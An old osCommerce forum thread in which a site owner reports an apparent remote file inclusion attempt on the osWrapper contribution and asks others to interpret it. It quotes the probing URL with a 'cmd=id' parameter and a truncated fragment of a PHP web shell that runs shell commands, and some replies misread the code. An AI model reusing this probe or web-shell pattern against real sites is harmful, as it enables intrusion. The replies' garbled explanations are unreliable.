osc hack attempt?

[walmslei]

Hi Everyone

 

Someone tried to call the URL below a few days back (about 6am UK time) via the osWrapper contribution

 

 

QUOTE

http://www.mysite.co.uk/wrapper.php?file=h...hkz.txt?&cmd=id

 

 

 

The file, HKZ.TXT contains the following coding:

 

 

QUOTE

bash-2.05# /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");

$output = ob_get_contents();

ob_end_clean();

$output = str_replace("\n","\nbash-2.05# ",$output);

if (!empty($output)) echo str_replace(">", ">", str_replace("<", "<", $output));

 

?>

 

 

 

Anyone have any ideas on what they were trying to achieve? My understanding is that the osWrapper function cannot call an external site, as it does not exist within the 'wrapped' folder (my tests indicate an error message every time I have tried).

 

Comments appreciated!

 

I posted this a few days back under contributions/osWrapper but no responses - apologies for the cross posting now, but felt this may be relevant to all osc users.

[♥Vger]

At first glance it looks like someone was trying to access your site either using Telnet or SSH, and was attempting to replace your content with their own. That's what it reads like to me. This

 

$output = str_replace("\n","\nbash-2.05# ",$output);

if (!empty($output)) echo str_replace

 

reads something like

 

string - replace, content, bash content, output, echo string replace if string replace is greater or lesser than output.

 

The problem is that they shouldn't have been able to get near your site to record anything in your logs using SSH or Telnet, not without the user name and password. So, perhaps it's internal, and something to do with the operation of the wrapper?

 

I've probably confused you even more, but these are my thoughts - for what they're worth! Vger

[Mark Evans]

This was an attempted Css attack which would go through your file system listing all files it found which it would then send to itself for display.

 

From looking at the contribution it doesnt seem to have any kind of checks to ensure that the file being called is actually a local file so I would be careful using this contribution.

[Chris Dunning]

Just for reference, how would such a check be performed?

[walmslei]

Hi

 

Thanks for the help so far

 

I do not think you can access external files using the wrapper module, as attempting to do so generates the following if you use the same syntax as our hacker (I replace the URL of the dodgy text file with Google's for now).

 

http://www.mysite.co.uk/wrapper.php?file=h...ww.google.co.uk

 

Generates the error message:

 

Warning: main(wrapped/http://www.google.co.uk): failed to open stream: No such file or directory in /home/mysite/public_html/wrapper.php on line 51

Fatal error: main(): Failed opening required 'wrapped/http://www.google.co.uk' (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/mysite/public_html/wrapper.php on line 51

 

 

In which case I would assume it might be someone trying to exploit an earlier version of the module, or perhaps someone who has read a 'misguided' security warning.

 

Do not understand the Telnet or SSH thing, because the useragent is IE6, and it is a http request, although I do not have much understanding of that side of things (I do know user agents can be spoofed though).

 

Anyways, put in a few blocks for brazil and the rest of South America (the originating country), s/he tried again last night (exactly the same URL, different IP but same range), got a 403 Forbidden code and disappeared.

 

Hopefully then no real problem, I would appreciate confirmation though about the wrapper module, from someone with some experience PHP.